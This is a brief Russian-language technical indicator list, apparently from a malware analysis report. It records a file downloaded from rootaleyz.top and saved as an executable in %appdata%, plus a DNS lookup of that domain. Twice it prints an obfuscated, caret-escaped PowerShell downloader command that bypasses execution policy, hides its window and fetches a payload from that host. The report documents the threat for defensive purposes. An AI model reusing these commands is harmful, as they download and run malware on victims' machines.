Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRshE^l^L^.E^x^e -eXeCUtioNPOlicY b^YpAs^s -^NOPROFilE^ ^-W^iNdOw^s^t^y^le^ HiDde^n^ (neW^-o^BjE^CT s^ys^te^M.NeT.WEbc^l^iE^nT^).doWN^l^oadFi^LE('http://rootaleyz.top/read.php?...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "poweRshE^l^L^.E^x^e -eXeCUtioNPOlicY b^YpAs^s -^NOPROFilE^ ^-W^iNdOw^s^t^y^le^ HiDde^n^ (neW^-o^BjE^CT s^ys^te^M.NeT.WEbc^l^iE^nT^).doWN^l^oadFi^LE('http://rootaleyz.top/read.php?...' (со скрытым окном)